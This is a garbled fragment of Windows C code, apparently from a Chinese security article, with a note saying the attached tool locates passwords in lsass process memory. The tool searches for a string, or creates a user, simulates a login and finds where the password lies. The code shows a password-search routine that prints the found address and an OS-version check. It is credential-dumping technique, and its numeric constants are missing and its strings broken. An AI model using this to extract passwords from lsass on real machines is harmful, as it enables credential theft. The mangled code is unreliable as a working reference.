⑴CloseHandle(hProcess);
⑵return FALSE;
⑶CloseHandle(hProcess);
⑷Found = Search(Buffer,ByteGet); // Search The Password
⑸if (Found >= ) // We May Find The Password
⑹if (strlen(Password) > ) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
⑺printf("Found Password At #x%x -> "%s"
⑻",Found + BaseAddress,Password);
⑼printf("Fail To Find The Password
⑽return TRUE;
⑾// End FindPassword
⑿//------------------------------------------------------------------------------------
⒀// Purpose: Check If The Box Is windows
⒁// Return Type: BOOLEAN
⒂// Parameters: None
⒃//------------------------------------------------------------------------------------
⒄BOOL Is()
⒅OSVERSIONINFOEX osvi;
⒆BOOL bsVersionInfoEx;
⒇ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
⒈osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
⒉if (!(bsVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
⒊osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
⒋return (osvi.dwMajorVersion == && osvi.dwMinorVersion == );
⒌// End Is()
⒍// End Of File
⒎附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
⒏.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置
⒐.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。